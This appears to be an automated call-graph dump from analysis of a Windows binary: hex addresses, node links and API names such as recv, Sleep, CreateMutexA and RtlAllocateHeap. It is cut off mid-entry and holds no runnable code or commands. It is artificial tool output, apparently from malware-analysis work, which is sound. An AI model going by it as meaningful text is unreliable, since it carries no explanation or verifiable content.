c07f5b 10266->10278 10266->10281 10268 c07e25 10267->10268 10272 c06c5a __cftof RtlAllocateHeap 10268->10272 10269->10228 10387 c08604 10270->10387 10273 c07fc7 10271->10273 10274 c07f69 10271->10274 10275 c07e30 10272->10275 10277 c07fcc 10273->10277 10273->10281 10283 c07f8b 10274->10283 10289 c07f77 10274->10289 10381 c08241 10274->10381 10275->10228 10284 c07fd1 10277->10284 10285 c07fdf 10277->10285 10278->10274 10282 c07fa2 10278->10282 10278->10289 10281->10283 10281->10289 10372 c08420 10281->10372 10282->10283 10358 c08390 10282->10358 10283->10228 10284->10283 10362 c085e5 10284->10362 10366 c08571 10285->10366 10289->10283 10390 c086ea 10289->10390 10292 c07fbb 10291->10292 10293 c07f4f 10291->10293 10294 c08001 10292->10294 10295 c07fc2 10292->10295 10300 c07f92 10292->10300 10293->10300 10302 c07f5b 10293->10302 10297 c08604 RtlAllocateHeap 10294->10297 10296 c07fc7 10295->10296 10308 c07f69 10295->10308 10299 c07fcc 10296->10299 10296->10300 10310 c07f77 10297->10310 10298 c08241 4 API calls 10298->10310 10304 c07fdf 10299->10304 10305 c07fd1 10299->10305 10303 c08420 RtlAllocateHeap 10300->10303 10300->10310 10312 c07f8b 10300->10312 10301 c07fa2 10307 c08390 4 API calls 10301->10307 10301->10312 10302->10301 10302->10308 10302->10310 10303->10310 10306 c08571 RtlAllocateHeap 10304->10306 10309 c085e5 RtlAllocateHeap 10305->10309 10305->10312 10306->10310 10307->10310 10308->10298 10308->10310 10308->10312 10309->10310 10311 c086ea 4 API calls 10310->10311 10310->10312 10311->10312 10312->10228 10316 c07d5e 10313->10316 10315 c07d40 10315->10246 10318 c07d80 10316->10318 10317 c07db7 10317->10315 10318->10317 10319 c075f6 __dosmaperr RtlAllocateHeap 10318->10319 10320 c07dac 10319->10320 10321 c06c5a __cftof RtlAllocateHeap 10320->10321 10321->10317 10323 c07b62 10322->10323 10324 c07b67 10322->10324 10326 c075f6 __dosmaperr RtlAllocateHeap 10323->10326 10330 c08ab6 10324->10330 10326->10324 10328 c07b99 10328->10228 10329 c075f6 __dosmaperr RtlAllocateHeap 10329->10328 10331 c08ad1 10330->10331 10334 c08868 10331->10334 10335 c0868d RtlAllocateHeap 10334->10335 10338 c0887a 10335->10338 10336 c088b3 10337 c0690a __cftof 4 API calls 10336->10337 10344 c088bf 10337->10344 10338->10336 10339 c0888f 10338->10339 10351 c07b85 10338->10351 10340 c075f6 __dosmaperr RtlAllocateHeap 10339->10340 10341 c08894 10340->10341 10343 c06c5a __cftof RtlAllocateHeap 10341->10343 10342 c06d52 4 API calls 10342->10344 10343->10351 10344->10342 10345 c088ee 10344->10345 10348 c08958 10345->10348 10352 c08a8d 10345->10352 10346 c08a8d RtlAllocateHeap 10349 c08a20 10346->10349 10348->10346 10350 c075f6 __dosmaperr RtlAllocateHeap 10349->10350 10349->10351 10350->10351 10351->10328 10351->10329 10353 c08ab2 10352->10353 10354 c08a9e 10352->10354 10353->10348 10354->10353 10355 c075f6 __dosmaperr RtlAllocateHeap 10354->10355 10356 c08aa7 10355->10356 10357 c06c5a __cftof RtlAllocateHeap 10356->10357 10357->10353 10359 c083ab 10358->10359 10360 c083dd 10359->10360 10394 c0c88e 10359->10394 10360->10289 10363 c085f1 10362->10363 10364 c08420 RtlAllocateHeap 10363->10364 10365 c08603 10364->10365 10365->10289 10369 c08586 10366->10369 10367 c075f6 __dosmaperr RtlAllocateHeap 10368 c0858f 10367->10368 10370 c06c5a __cftof RtlAllocateHeap 10368->10370 10369->10367 10371 c0859a 10369->10371 10370->10371 10371->10289 10373 c08433 10372->10373 10374 c0844e 10373->10374 10376 c08465 10373->10376 10375 c075f6 __dosmaperr RtlAllocateHeap 10374->10375 10377 c08453 10375->10377 10380 c0845e 10376->10380 10422 c0779f 10376->10422 10378 c06c5a __cftof RtlAllocateHeap 10377->10378 10378->10380 10380->10289 10382 c0825a 10381->10382 10383 c0779f RtlAllocateHeap 10382->10383 10384 c08297 10383->10384 10435 c0d3c8 10384->10435 10386 c0830d 10386->10289 10386->10386 10388 c08420 RtlAllocateHeap 10387->10388 10389 c0861b 10388->10389 10389->10289 10392 c0875d std::future_error::future_error 10390->10392 10393 c08707 10390->10393 10391 c0c88e __cftof 4 API calls 10391->10393 10392->10283 10393->10391 10393->10392 10397 c0c733 10394->10397 10398 c0c743 10397->10398 10399 c0c781 10398->10399 10400 c0c76d 10398->10400 10410 c0c748 10398->10410 10402 c0690a __cftof 4 API calls 10399->10402 10401 c075f6 __dosmaperr RtlAllocateHeap 10400->10401 10403 c0c772 10401->10403 10404 c0c78c 10402->10404 10405 c06c5a __cftof RtlAllocateHeap 10403->10405 10406 c0c79c 10404->10406 10409 c0c7c8 __cftof 10404->10409 10405->10410 10418 c12b7d 10406->10418 10413 c0c7de __cftof 10409->10413 10417 c0c815 __cftof 10409->10417 10410->10360 10411 c075f6 __dosmaperr RtlAllocateHeap 10411->10410 10412 c075f6 __dosmaperr RtlAllocateHeap 10415 c0c87f 10412->10415 10413->10410 10413->10411 10414 c075f6 __dosmaperr RtlAllocateHeap 10414->10410 10416 c06c5a __cftof RtlAllocateHeap 10415->10416 10416->10410 10417->10410 10417->10412 10419 c0c7b1 10418->10419 10420 c12b98 10418->10420 10419->10410 10419->10414 10420->10419 10421 c12c28 __cftof RtlAllocateHeap 10420->10421 10421->10419 10423 c077c3 10422->10423 10424 c077b4 10422->10424 10426 c077b9 10423->10426 10427 c0b04b __cftof RtlAllocateHeap 10423->10427 10425 c075f6 __dosmaperr RtlAllocateHeap 10424->10425 10425->10426 10426->10380 10428 c077ea 10427->10428 10429 c07801 10428->10429 10432 c07a33 10428->10432 10431 c0adf5 ___free_lconv_mon RtlAllocateHeap 10429->10431 10431->10426 10433 c0adf5 ___free_lconv_mon RtlAllocateHeap 10432->10433 10434 c07a42 10433->10434 10434->10429 10436 c0d3d8 10435->10436 10437 c0d3ee 10435->10437 10438 c075f6 __dosmaperr RtlAllocateHeap 10436->10438 10437->10436 10441 c0d400 10437->10441 10439 c0d3dd 10438->10439 10440 c06c5a __cftof RtlAllocateHeap 10439->10440 10454 c0d3e7 10440->10454 10442 c0d439 10441->10442 10444 c0d467 10441->10444 10456 c0d2ff 10442->10456 10443 c0d485 10447 c0d4e4 10443->10447 10448 c0d4ae 10443->10448 10444->10443 10445 c0d48a 10444->10445 10461 c0cbdf 10445->10461 10489 c0cef8 10447->10489 10449 c0d4b3 10448->10449 10450 c0d4cc 10448->10450 10472 c0d23e 10449->10472 10482 c0d0e2 10450->10482 10454->10386 10457 c0d315 10456->10457 10458 c0d320 10456->10458 10457->10454 10459 c0a1f1 ___std_exception_copy RtlAllocateHeap 10458->10459 10460 c0d37b __cftof 10459->10460 10460->10454 10462 c0cbf1 10461->10462 10463 c0690a __cftof 4 API calls 10462->10463 10464 c0cc05 10463->10464 10465 c0cc21 10464->10465 10466 c0cc0d 10464->10466 10469 c0cef8 4 API calls 10465->10469 10471 c0cc1c __alldvrm __cftof _strrchr 10465->10471 10467 c075f6 __dosmaperr RtlAllocateHeap 10466->10467 10468 c0cc12 10467->10468 10470 c06c5a __cftof RtlAllocateHeap 10468->10470 10469->10471 10470->10471 10471->10454 10497 c131a8 10472->10497 10474 c0d26c 10531 c12c47 10474->10531 10476 c0d29e 10477 c0d2de 10476->10477 10479 c0d2b7 10476->10479 10481 c0d2a5 10476->10481 10543 c0cf9a 10477->10543 10479->10479 10540 c0d16d 10479->10540 10481->10454 10483 c131a8 RtlAllocateHeap 10482->10483 10484 c0d10f 10483->10484 10485 c12c47 RtlAllocateHeap 10484->10485 10486 c0d147 10485->10486 10487 c0d14e 10486->10487 10488 c0d16d 4 API calls 10486->10488 10487->10454 10488->10487 10490 c0cf10 10489->10490 10491 c131a8 RtlAllocateHeap 10490->10491 10492 c0cf29 10491->10492 10493 c12c47 RtlAllocateHeap 10492->10493 10494 c0cf6e 10493->10494 10495 c0cf75 10494->10495 10496 c0cf9a 4 API calls 10494->10496 10495->10454 10496->10495 10500 c131db 10497->10500 10498 c0a1f1 ___std_exception_copy RtlAllocateHeap 10501 c1448b __cftof std::future_error::future_error 10498->10501 10499 c13250 10499->10498 10500->10499 10502 c132a7 10500->10502 10501->10474 10503 c16560 RtlAllocateHeap 10502->10503 10504 c1331e 10503->10504 10505 c16670 __floor_pentium4 RtlAllocateHeap 10504->10505 10506 c13328 10505->10506 10507 c135a2 10506->10507 10509 c133cc 10506->10509 10511 c1362c __cftof 10506->10511 10508 c0bac8 __cftof RtlAllocateHeap 10507->10508 10507->10511 10508->10511 10510 c0bac8 __cftof RtlAllocateHeap 10509->10510 10513 c13456 10509->10513 10510->10513 10514 c0bac8 __cftof RtlAllocateHeap 10511->10514 10512 c0bac8 __cftof RtlAllocateHeap 10515 c1359a 10512->10515 10513->10512 10514->10515 10527 c13dec __cftof 10515->10527 10530 c13998 __cftof 10515->10530 10516 c1427d 10518 c12d10 RtlAllocateHeap 10516->10518 10517 c13d0c 10519 c13dda 10517->10519 10520 c0bac8 __cftof RtlAllocateHeap 10517->10520 10524 c142c9 10518->10524 10519->10516 10521 c0bac8 __cftof RtlAllocateHeap 10519->10521 10520->10519 10521->10516 10522 c0bac8 RtlAllocateHeap __cftof 10522->10530 10523 c0bac8 RtlAllocateHeap __cftof 10523->10527 10525 c0bac8 __cftof RtlAllocateHeap 10524->10525 10529 c14333 10524->10529 10525->10529 10526 c12d10 RtlAllocateHeap 10526->10529 10527->10517 10527->10523 10528 c0bac8 __cftof RtlAllocateHeap 10528->10529 10529->10501 10529->10526 10529->10528 10530->10517 10530->10522 10532 c12c6a 10531->10532 10536 c12c54 10531->10536 10535 c12c86 10532->10535 10532->10536 10533 c075f6 __dosmaperr RtlAllocateHeap 10538 c12c59 10533->10538 10534 c06c5a __cftof RtlAllocateHeap 10539 c12c63 10534->10539 10537 c075f6 __dosmaperr RtlAllocateHeap 10535->10537 10536->10533 10536->10539 10537->10538 10538->10534 10539->10476 10541 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10540->10541 10542 c0d183 __cftof 10541->10542 10542->10481 10544 c0cfab 10543->10544 10545 c0cfb9 10544->10545 10546 c0cfce 10544->10546 10547 c075f6 __dosmaperr RtlAllocateHeap 10545->10547 10548 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10546->10548 10549 c0cfbe 10547->10549 10552 c0cfda 10548->10552 10550 c06c5a __cftof RtlAllocateHeap 10549->10550 10551 c0cfc8 10550->10551 10551->10481 10553 c0a1f1 ___std_exception_copy RtlAllocateHeap 10552->10553 10554 c0d057 __cftof 10553->10554 10555 bd18a0 10556 be80c0 RtlAllocateHeap 10555->10556 10557 bd18b1 10556->10557 10560 bed64e 10557->10560 10563 bed621 10560->10563 10564 bed637 10563->10564 10565 bed630 10563->10565 10572 c098fa 10564->10572 10569 c0988e 10565->10569 10568 bd18bb 10570 c098fa RtlAllocateHeap 10569->10570 10571 c098a0 10570->10571 10571->10568 10575 c09630 10572->10575 10574 c0992b 10574->10568 10576 c0963c __cftof 10575->10576 10579 c0968b 10576->10579 10578 c09657 10578->10574 10580 c096a7 10579->10580 10588 c0971e __dosmaperr 10579->10588 10587 c096fe 10580->10587 10580->10588 10589 c0edf6 10580->10589 10582 c0edf6 RtlAllocateHeap 10584 c09714 10582->10584 10583 c096f4 10585 c0adf5 ___free_lconv_mon RtlAllocateHeap 10583->10585 10586 c0adf5 ___free_lconv_mon RtlAllocateHeap 10584->10586 10585->10587 10586->10588 10587->10582 10587->10588 10588->10578 10588->10588 10590 c0ee03 10589->10590 10591 c0ee1e 10589->10591 10590->10591 10592 c0ee0f 10590->10592 10593 c0ee2d 10591->10593 10598 c14fdc 10591->10598 10594 c075f6 __dosmaperr RtlAllocateHeap 10592->10594 10605 c1500f 10593->10605 10597 c0ee14 __cftof 10594->10597 10597->10583 10599 c14fe7 10598->10599 10602 c14ffc 10598->10602 10600 c075f6 __dosmaperr RtlAllocateHeap 10599->10600 10601 c14fec 10600->10601 10603 c06c5a __cftof RtlAllocateHeap 10601->10603 10602->10593 10604 c14ff7 10603->10604 10604->10593 10606 c15027 10605->10606 10607 c1501c 10605->10607 10609 c1502f 10606->10609 10613 c15038 __dosmaperr 10606->10613 10608 c0b04b __cftof RtlAllocateHeap 10607->10608 10610 c15024 10608->10610 10611 c0adf5 ___free_lconv_mon RtlAllocateHeap 10609->10611 10610->10597 10611->10610 10612 c075f6 __dosmaperr RtlAllocateHeap 10612->10610 10613->10610 10613->10612 10614 bd20a0 10619 bec68b 10614->10619 10617 bed64e RtlAllocateHeap 10618 bd20b6 10617->10618 10622 bec3d5 10619->10622 10621 bd20ac 10621->10617 10623 bec3e1 10622->10623 10624 bec3eb 10622->10624 10625 bec39e 10623->10625 10626 bec3be 10623->10626 10624->10621 10625->10624 10631 beccd5 10625->10631 10635 becd0a 10626->10635 10629 bec3d0 10629->10621 10632 becce3 InitializeCriticalSectionEx 10631->10632 10634 bec3b7 10631->10634 10632->10634 10634->10621 10636 becd1f RtlInitializeConditionVariable 10635->10636 10636->10629 10652 bd34a0 10653 bd34aa 10652->10653 10654 bd34ca shared_ptr 10652->10654 10653->10654 10655 c06c6a RtlAllocateHeap 10653->10655 10656 bd34f2 Concurrency::cancel_current_task shared_ptr 10655->10656 11770 bd5a9e 11773 bd5a61 11770->11773 11771 be80c0 RtlAllocateHeap 11771->11773 11773->11770 11773->11771 11774 be7a00 RtlAllocateHeap 11773->11774 11775 bd5bdd std::future_error::future_error 11773->11775 11776 bd5730 11773->11776 11774->11773 11780 bd5860 shared_ptr 11776->11780 11784 bd5799 shared_ptr 11776->11784 11777 bd592a 11779 be8200 RtlAllocateHeap 11777->11779 11778 be80c0 RtlAllocateHeap 11778->11784 11779->11780 11781 bd5900 shared_ptr std::future_error::future_error 11780->11781 11782 c06c6a RtlAllocateHeap 11780->11782 11781->11773 11783 bd5934 11782->11783 11784->11777 11784->11778 11784->11780 10664 c144f2 10665 c1450c 10664->10665 10666 c144ff 10664->10666 10668 c14518 10665->10668 10669 c075f6 __dosmaperr RtlAllocateHeap 10665->10669 10667 c075f6 __dosmaperr RtlAllocateHeap 10666->10667 10670 c14504 10667->10670 10671 c14539 10669->10671 10672 c06c5a __cftof RtlAllocateHeap 10671->10672 10672->10670 10673 bd3c8e 10674 bd3c98 10673->10674 10675 bd3cb4 10674->10675 10683 bd2410 10674->10683 10678 bd3ccf 10675->10678 10698 bd3810 10675->10698 10681 bd3810 4 API calls 10678->10681 10682 bd3cdb 10681->10682 10684 bd2424 10683->10684 10702 beb52d 10684->10702 10687 bd3ce0 10688 bd3d42 10687->10688 10690 bd3d52 10687->10690 10757 be7d50 10688->10757 10691 bed3e2 RtlAllocateHeap 10690->10691 10692 bd3d84 10691->10692 10693 be7d50 RtlAllocateHeap 10692->10693 10695 bd3e03 10692->10695 10693->10695 10694 bd3e9b shared_ptr 10694->10675 10695->10694 10696 c06c6a RtlAllocateHeap 10695->10696 10697 bd3ec1 10696->10697 10699 bd381c 10698->10699 10789 bd2440 10699->10789 10710 c03aed 10702->10710 10704 bd242a 10704->10687 10705 beb5a5 ___std_exception_copy 10717 beb1ad 10705->10717 10706 beb598 10713 beaf56 10706->10713 10721 c04f29 10710->10721 10712 beb555 10712->10704 10712->10705 10712->10706 10714 beaf9f ___std_exception_copy 10713->10714 10716 beafb2 shared_ptr 10714->10716 10733 beb39f 10714->10733 10716->10704 10718 beb1d8 10717->10718 10719 beb1e1 shared_ptr 10717->10719 10720 beb39f 5 API calls 10718->10720 10719->10704 10720->10719 10728 c04f37 10721->10728 10723 c04f2e __cftof 10723->10712 10724 c0d634 __cftof 4 API calls 10723->10724 10727 c08bfc __cftof 10723->10727 10724->10727 10725 c065ed __cftof 3 API calls 10726 c08c2f 10725->10726 10727->10725 10729 c04f40 10728->10729 10730 c04f43 10728->10730 10729->10723 10731 c04f77 10730->10731 10732 c08ba3 ___std_exception_copy RtlAllocateHeap 10730->10732 10731->10723 10732->10731 10744 bebedf 10733->10744 10736 beb3e8 10736->10716 10753 becc31 10744->10753 10747 c06cbb 10748 c06cc7 __cftof 10747->10748 10749 c0a671 __cftof 4 API calls 10748->10749 10752 c06ccc 10749->10752 10750 c08bec __cftof 4 API calls 10751 c06cf6 10750->10751 10752->10750 10754 becc3f InitOnceExecuteOnce 10753->10754 10756 beb3e1 10753->10756 10754->10756 10756->10736 10756->10747 10758 be7dcb 10757->10758 10759 be7d62 10757->10759 10760 bd2480 RtlAllocateHeap 10758->10760 10761 be7d9c 10759->10761 10762 be7d6d 10759->10762 10764 be7d7a 10760->10764 10763 be7db9 10761->10763 10766 bed3e2 RtlAllocateHeap 10761->10766 10762->10758 10765 be7d74 10762->10765 10763->10690 10767 c06c6a RtlAllocateHeap 10764->10767 10770 be7d83 10764->10770 10768 bed3e2 RtlAllocateHeap 10765->10768 10769 be7da6 10766->10769 10775 be7dd5 10767->10775 10768->10764 10769->10690 10770->10690 10771 be7f20 10772 be9270 RtlAllocateHeap 10771->10772 10785 be7e91 __cftof 10772->10785 10773 be7e01 10773->10690 10774 be7f1b 10779 bd2480 RtlAllocateHeap 10774->10779 10775->10771 10775->10773 10775->10774 10777 be7ea7 10775->10777 10778 be7e80 10775->10778 10776 c06c6a RtlAllocateHeap 10784 be7f2a __cftof 10776->10784 10782 bed3e2 RtlAllocateHeap 10777->10782 10777->10785 10778->10774 10780 be7e8b 10778->10780 10779->10771 10781 bed3e2 RtlAllocateHeap 10780->10781 10781->10785 10782->10785 10783 be7f61 shared_ptr 10783->10690 10784->10783 10786 c06c6a RtlAllocateHeap 10784->10786 10785->10776 10788 be7f02 shared_ptr 10785->10788 10787 be7f7c 10786->10787 10788->10690 10792 beb5d6 10789->10792 10791 bd2472 10793 beb5f1 Concurrency::cancel_current_task 10792->10793 10794 c08bec __cftof 4 API calls 10793->10794 10796 beb658 __cftof std::future_error::future_error 10793->10796 10795 beb69f 10794->10795 10796->10791 11805 be8680 11806 be86e0 11805->11806 11806->11806 11814 be7760 11806->11814 11808 be86f9 11809 be8f40 RtlAllocateHeap 11808->11809 11810 be8714 11808->11810 11809->11810 11811 be8f40 RtlAllocateHeap 11810->11811 11813 be8769 11810->11813 11812 be87b1 11811->11812 11818 be777b 11814->11818 11827 be7864 shared_ptr __cftof 11814->11827 11815 be78f1 11816 be9270 RtlAllocateHeap 11815->11816 11817 be78f6 11816->11817 11819 bd2480 RtlAllocateHeap 11817->11819 11818->11815 11820 be77ea 11818->11820 11821 be7811 11818->11821 11826 be77fb __cftof 11818->11826 11818->11827 11822 be78fb 11819->11822 11820->11817 11824 bed3e2 RtlAllocateHeap 11820->11824 11823 bed3e2 RtlAllocateHeap 11821->11823 11821->11826 11823->11826 11824->11826 11825 c06c6a RtlAllocateHeap 11825->11815 11826->11825 11826->11827 11827->11808 11828 bda682 11829 bda68a shared_ptr 11828->11829 11830 bda949 11829->11830 11833 bda75d shared_ptr 11829->11833 11831 bda94e 11830->11831 11832 c06c6a RtlAllocateHeap 11830->11832 11834 bda953 Sleep CreateMutexA 11831->11834 11835 c06c6a RtlAllocateHeap 11831->11835 11832->11831 11836 be80c0 RtlAllocateHeap 11833->11836 11838 bda98e 11834->11838 11835->11834 11837 bda903 11836->11837 11843 bd6ae9 11847 bd6b01 11843->11847 11844 be80c0 RtlAllocateHeap 11845 bd6bac 11844->11845 11846 be9280 RtlAllocateHeap 11845->11846 11848 bd6bbd shared_ptr 11846->11848 11847->11844 11847->11848 11849 be80c0 RtlAllocateHeap 11848->11849 11850 bd6ce3 shared_ptr std::future_error::future_error 11849->11850 11871 bd9adc 11875 bd9aea shared_ptr 11871->11875 11872 bda917 11873 bda953 Sleep CreateMutexA 11872->11873 11874 c06c6a RtlAllocateHeap 11872->11874 11877 bda98e 11873->11877 11874->11873 11875->11872 11876 bd9b4b shared_ptr 11875->11876 11878 bd9b59 11876->11878 11879 bd9b65 11876->11879 11882 be80c0 RtlAllocateHeap 11878->11882 11880 be7a00 RtlAllocateHeap 11879->11880 11881 bd9b74 11880->11881 11883 bd5c10 4 API calls 11881->11883 11884 bda903 11882->11884 11885 bd9b7c 11883->11885 11886 bd8b30 4 API calls 11885->11886 11887 bd9b8d 11886->11887 11888 be8220 RtlAllocateHeap 11887->11888 11889 bd9b9c 11888->11889 11890 be7a00 RtlAllocateHeap 11889->11890 11891 bd9ca9 11890->11891 11892 bd5c10 4 API calls 11891->11892 11893 bd9cb1 11892->11893 11894 bd8b30 4 API calls 11893->11894 11895 bd9cc2 11894->11895 11896 be8220 RtlAllocateHeap 11895->11896 11897 bd9cd1 11896->11897 10845 bed0c7 10846 bed0d7 10845->10846 10847 bed17f 10846->10847 10848 bed17b RtlWakeAllConditionVariable 10846->10848 10854 bd20c0 10855 bec68b __Mtx_init_in_situ 2 API calls 10854->10855 10856 bd20cc 10855->10856 10857 bed64e RtlAllocateHeap 10856->10857 10858 bd20d6 10857->10858 10864 bde0c0 recv 10865 bde122 recv 10864->10865 10866 bde157 recv 10865->10866 10867 bde191 10866->10867 10868 bde2b3 std::future_error::future_error 10867->10868 10873 bec6ac 10867->10873 10880 bec452 10873->10880 10875 bde2ee 10876 bec26a 10875->10876 10877 bec292 10876->10877 10878 bec274 10876->10878 10877->10877 10878->10877 10897 bec297 10878->10897 10881 bec4a8 10880->10881 10883 bec47a std::future_error::future_error 10880->10883 10881->10883 10886 becf6b 10881->10886 10883->10875 10884 bec4fd __Xtime_diff_to_millis2 10884->10883 10885 becf6b _xtime_get GetSystemTimePreciseAsFileTime 10884->10885 10885->10884 10887 becf7a 10886->10887 10889 becf87 __aulldvrm 10886->10889 10887->10889 10890 becf44 10887->10890 10889->10884 10893 becbea 10890->10893 10894 becbfb GetSystemTimePreciseAsFileTime 10893->10894 10895 becc07 10893->10895 10894->10895 10895->10889 10902 bd2ae0 10897->10902 10901 bec2bf Concurrency::cancel_current_task 10903 bebedf InitOnceExecuteOnce 10902->10903 10905 bd2af4 __cftof 10903->10905 10904 bd2aff 10910 bec1ff 10904->10910 10905->10904 10906 c0a671 __cftof 4 API calls 10905->10906 10909 c06ccc 10906->10909 10907 c08bec __cftof 4 API calls 10908 c06cf6 10907->10908 10909->10907 10911 bec20b __EH_prolog3_GS 10910->10911 10912 be80c0 RtlAllocateHeap 10911->10912 10913 bec23d 10912->10913 10918 bd26b0 10913->10918 10915 bec252 10935 be7970 10915->10935 10917 bec25a 10917->10901 10919 be7a00 RtlAllocateHeap 10918->10919 10920 bd2702 10919->10920 10921 bd2725 10920->10921 10940 be8f40 10920->10940 10923 be8f40 RtlAllocateHeap 10921->10923 10924 bd278e 10921->10924 10923->10924 10925 bd27ed shared_ptr 10924->10925 10927 bd28b8 10924->10927 10926 c038af ___std_exception_copy RtlAllocateHeap 10925->10926 10930 bd284b 10926->10930 10928 c06c6a RtlAllocateHeap 10927->10928 10928->10930 10929 bd287a shared_ptr std::future_error::future_error 10929->10915 10930->10929 10931 c06c6a RtlAllocateHeap 10930->10931 10932 bd28c2 10931->10932 10961 c03912 10932->10961 10934 bd28e5 shared_ptr 10934->10915 10936 be797b 10935->10936 10937 be7996 shared_ptr 10935->10937 10936->10937 10938 c06c6a RtlAllocateHeap 10936->10938 10937->10917 10939 be79ba 10938->10939 10941 be908e 10940->10941 10942 be8f6b 10940->10942 10943 be9270 RtlAllocateHeap 10941->10943 10946 be8fdc 10942->10946 10947 be8fb2 10942->10947 10944 be9093 10943->10944 10945 bd2480 RtlAllocateHeap 10944->10945 10953 be8fc3 __cftof 10945->10953 10950 bed3e2 RtlAllocateHeap 10946->10950 10946->10953 10947->10944 10948 be8fbd 10947->10948 10949 bed3e2 RtlAllocateHeap 10948->10949 10949->10953 10950->10953 10951 c06c6a RtlAllocateHeap 10952 be909d 10951->10952 10954 be90b8 10952->10954 10956 bd2480 Concurrency::cancel_current_task 10952->10956 10957 be90be 10952->10957 10953->10951 10959 be904c shared_ptr __cftof 10953->10959 10955 bed3e2 RtlAllocateHeap 10954->10955 10955->10957 10958 c038af ___std_exception_copy RtlAllocateHeap 10956->10958 10957->10921 10960 bd24c3 10958->10960 10959->10921 10960->10921 10962 c03926 10961->10962 10963 c0391f 10961->10963 10962->10934 10964 c08ba3 ___std_exception_copy RtlAllocateHeap 10963->10964 10964->10962 11898 bd2ec0 11899 bd2f06 11898->11899 11908 bd2f6f 11898->11908 11900 bec6ac GetSystemTimePreciseAsFileTime 11899->11900 11901 bd2f12 11900->11901 11903 bd2f1d 11901->11903 11904 bd301e 11901->11904 11902 bd2fef 11907 bed3e2 RtlAllocateHeap 11903->11907 11910 bd2f30 __Mtx_unlock 11903->11910 11905 bec26a 5 API calls 11904->11905 11906 bd3024 11905->11906 11909 bec26a 5 API calls 11906->11909 11907->11910 11908->11902 11911 bec6ac GetSystemTimePreciseAsFileTime 11908->11911 11912 bd2fb9 11909->11912 11910->11906 11910->11908 11911->11912 11913 bec26a 5 API calls 11912->11913 11914 bd2fc0 __Mtx_unlock 11912->11914 11913->11914 11915 bec26a 5 API calls 11914->11915 11916 bd2fd8 __Cnd_broadcast 11914->11916 11915->11916 11916->11902 11917 bec26a 5 API calls 11916->11917 11918 bd303c 11917->11918 11919 bec6ac GetSystemTimePreciseAsFileTime 11918->11919 11929 bd3080 shared_ptr __Mtx_unlock 11919->11929 11920 bd31c5 11921 bec26a 5 API calls 11920->11921 11922 bd31cb 11921->11922 11923 bec26a 5 API calls 11922->11923 11924 bd31d1 11923->11924 11925 bec26a 5 API calls 11924->11925 11931 bd3193 __Mtx_unlock 11925->11931 11926 bd31a7 std::future_error::future_error 11927 bec26a 5 API calls 11928 bd31dd 11927->11928 11929->11920 11929->11922 11929->11926 11930 bec6ac GetSystemTimePreciseAsFileTime 11929->11930 11932 bd315f 11930->11932 11931->11926 11931->11927 11932->11920 11932->11924 11932->11931 11933 bebd4c GetSystemTimePreciseAsFileTime 11932->11933 11933->11932 11954 c06a44 11955 c06a52 11954->11955 11956 c06a5c 11954->11956 11967 c0b655 11955->11967 11972 c0698d 11956->11972 11959 c06a59 11960 c06a76 11975 c068ed 11960->11975 11963 c06a8a 11965 c06aa8 11963->11965 11966 c0adf5 ___free_lconv_mon RtlAllocateHeap 11963->11966 11964 c0b655 RtlAllocateHeap 11964->11963 11966->11965 11969 c0b662 11967->11969 11968 c0b679 11968->11959 11969->11968 11978 c075c0 11969->11978 11973 c0690a __cftof 4 API calls 11972->11973 11974 c0699f 11973->11974 11974->11960 11986 c0683b 11975->11986 11983 c075e3 11978->11983 11980 c075cb __dosmaperr 11981 c075f6 __dosmaperr RtlAllocateHeap 11980->11981 11982 c075de 11981->11982 11982->11959 11984 c0a7c8 __dosmaperr RtlAllocateHeap 11983->11984 11985 c075e8 11984->11985 11985->11980 11987 c06863 11986->11987 11988 c06849 11986->11988 11990 c0686a 11987->11990 11992 c06889 __cftof 11987->11992 11999 c069cc 11988->11999 11996 c06853 11990->11996 12003 c069e6 11990->12003 11993 c069e6 RtlAllocateHeap 11992->11993 11995 c0689f __cftof 11992->11995 11993->11995 11994 c075c0 __dosmaperr RtlAllocateHeap 11997 c068ab 11994->11997 11995->11994 11995->11996 11996->11963 11996->11964 11998 c075f6 __dosmaperr RtlAllocateHeap 11997->11998 11998->11996 12000 c069df 11999->12000 12001 c069d7 11999->12001 12000->11996 12002 c0adf5 ___free_lconv_mon RtlAllocateHeap 12001->12002 12002->12000 12004 c069cc RtlAllocateHeap 12003->12004 12005 c069f4 12004->12005 12008 c06a25 12005->12008 12009 c0b04b __cftof RtlAllocateHeap 12008->12009 12010 c06a05 12009->12010 12010->11996 10983 bd1020 10984 be80c0 RtlAllocateHeap 10983->10984 10985 bd1031 10984->10985 10986 bed64e RtlAllocateHeap 10985->10986 10987 bd103b 10986->10987 11001 bda418 11003 bda420 shared_ptr 11001->11003 11002 bda93f 11004 c06c6a RtlAllocateHeap 11002->11004 11003->11002 11005 bda4f3 shared_ptr 11003->11005 11006 bda944 11004->11006 11008 be80c0 RtlAllocateHeap 11005->11008 11007 c06c6a RtlAllocateHeap 11006->11007 11009 bda949 11007->11009 11010 bda903 11008->11010 11011 bda94e 11009->11011 11012 c06c6a RtlAllocateHeap 11009->11012 11013 bda953 Sleep CreateMutexA 11011->11013 11014 c06c6a RtlAllocateHeap 11011->11014 11012->11011 11015 bda98e 11013->11015 11014->11013 11039 bd1000 11040 bed64e RtlAllocateHeap 11039->11040 11041 bd100a 11040->11041 12049 bd2e00 12050 bd2e28 12049->12050 12051 bec68b __Mtx_init_in_situ 2 API calls 12050->12051 12052 bd2e33 12051->12052 11042 bda079 11043 bda081 shared_ptr 11042->11043 11044 bda930 11043->11044 11045 bda154 shared_ptr 11043->11045 11046 c06c6a RtlAllocateHeap 11044->11046 11048 be80c0 RtlAllocateHeap 11045->11048 11047 bda953 Sleep CreateMutexA 11046->11047 11050 bda98e 11047->11050 11049 bda903 11048->11049 11051 bdcc79 11052 bdcc84 shared_ptr 11051->11052 11053 bdce09 shared_ptr std::future_error::future_error 11052->11053 11054 bdce31 11052->11054 11056 be7a00 RtlAllocateHeap 11052->11056 11058 bd5c10 4 API calls 11052->11058 11066 be8f40 RtlAllocateHeap 11052->11066 11067 bd9030 11052->11067 11080 be8220 11052->11080 11055 c06c6a RtlAllocateHeap 11054->11055 11057 bdce36 11055->11057 11056->11052 11059 be7a00 RtlAllocateHeap 11057->11059 11058->11052 11060 bdce92 11059->11060 11062 bd5c10 4 API calls 11060->11062 11063 bdce9d 11062->11063 11088 bdca70 11063->11088 11066->11052 11068 bd9080 11067->11068 11069 be7a00 RtlAllocateHeap 11068->11069 11070 bd908f 11069->11070 11071 bd5c10 4 API calls 11070->11071 11072 